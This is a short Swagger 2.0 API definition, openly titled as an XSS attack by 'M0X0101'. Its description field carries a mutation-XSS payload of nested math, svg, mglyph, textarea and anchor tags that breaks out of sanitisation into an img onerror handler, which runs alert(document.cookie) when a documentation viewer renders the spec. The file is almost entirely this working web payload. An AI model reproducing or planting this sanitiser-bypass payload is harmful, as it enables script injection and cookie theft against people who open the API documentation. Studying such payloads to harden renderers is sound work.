swagger: '2.0'
info:
  title: XSS Attack BY M0X0101
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(document.cookie)'>">
paths:
  /M0X0101:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M0X0101
      operationId: findAccounts_Attacked_D
      
